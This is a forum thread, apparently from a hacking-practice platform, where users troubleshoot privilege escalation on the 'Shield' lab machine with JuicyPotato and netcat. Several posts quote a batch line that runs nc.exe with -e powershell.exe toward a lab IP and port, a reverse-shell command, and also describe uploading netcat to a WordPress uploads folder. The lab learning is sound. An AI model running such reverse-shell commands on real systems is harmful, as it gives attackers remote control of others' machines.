Starting Point: Shield, JuicyPotato and netcat

@tasidonya 5555
thats whats in my .bat file as well

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

Type your comment> @tasidonya said:

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

yeah thats right. I’ll just check back on it.

Thanks

@R4ZZB33RY can you show us the contents of your shell.bat file? Everything else looks fine so I’d suspect something is wrong in that. Either that or you have something blocking the incoming connection on your end (firewall etc). Have you confirmed it works fine if you just run the shell.bat normally from the remote machine rather than trying to run it with js.exe as system?

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

Type your comment> @R4ZZB33RY said:

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

your .bat file is not correct

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

Type your comment> @VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

Type your comment> @R4ZZB33RY said:

Type your comment> @VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

Great :smiley:

guys, I don’t get how to download juicypotato. if I go to the github page, and i donload it, there is not file called JuicyPotato.exe. where is it??

Here you go: Releases · ohpe/juicy-potato · GitHub

Type your comment> @tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

Type your comment> @Jade86 said:

Type your comment> @tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

it gets flagged by your operating system. You have to open the file

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

Type your comment> @tasidonya said:

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

ok I’ll do that. Just to be absolutely sure, you just clicked on the file and it downloaded, yeah?

@Jade86 yes.

Type your comment> @R4ZZB33RY said:

Type your comment> @Jade86 said:

Type your comment> @tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

it gets flagged by your operating system. You have to open the file

Ah I see! Ok, I feel a bit dumb here, but after I open the file, how do I save it in some folder on my machine? I’m very new to linux…

nevermind, done it. Thank you guys!!

What am I doing wrong?!

Type your comment> @misentomanuel said:

What am I doing wrong?!
https://imgur.com/zLfx2Zh.png

ok so I’m not an expert but it seems that there is no file called nc.exe in your local /home/kali/Desktop folder, so when you try to upload it to the box it tells you so. Then, obviously when you try and execute it, you can’t because the file is not there.
The reason why you do see a file called nc.exe in the remote uploads folder is probably cause someone else is doing the same box and they uploaded it successfully. The other thing, when you execute nc.exe, you need to change the ip address to YOUR own ip address, so that 10.10.14.2 needs to be changed, otherwise you are basically contacting anotehr machine that isn’t yours. also when you do lcd /home/username/downloads, that again is a fictitious folder that the guy who wrote the walkthrough created, but you need to substitute the path to your local folder that contains the exploits to that fictitious folder. Start by changing these things, and see how it goes.